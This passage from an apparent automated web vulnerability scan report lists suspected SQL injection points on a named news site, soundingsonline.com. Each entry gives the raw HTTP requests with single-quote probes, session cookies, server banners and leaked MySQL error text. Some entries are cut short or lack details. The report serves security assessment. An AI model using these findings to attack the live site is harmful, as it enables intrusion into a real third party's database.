Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.73. http://www.soundingsonline.com/component/mailto/ [link parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/mailto/

Issue detail

The link parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the link parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29t' at line 1</font>
...[SNIP]...

Request 2

GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.74. http://www.soundingsonline.com/component/mailto/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/mailto/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D&1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.75. http://www.soundingsonline.com/component/mailto/ [tmpl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/mailto/

Issue detail

The tmpl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tmpl parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/mailto/?tmpl=component'&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/mailto/?tmpl=component''&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.76. http://www.soundingsonline.com/component/yvcomment/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/yvcomment/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component'/yvcomment/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component''/yvcomment/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.77. http://www.soundingsonline.com/component/yvcomment/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/yvcomment/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/yvcomment'/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/yvcomment''/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.78. http://www.soundingsonline.com/component/yvcomment/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/yvcomment/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/yvcomment/?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/yvcomment/?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.79. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/contact-us

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /contact-us?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /contact-us?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.80. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.81. http://www.soundingsonline.com/features/destinations [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/destinations

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/destinations?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

Request 2

GET /features/destinations?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.82. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/in-depth

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/in-depth?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
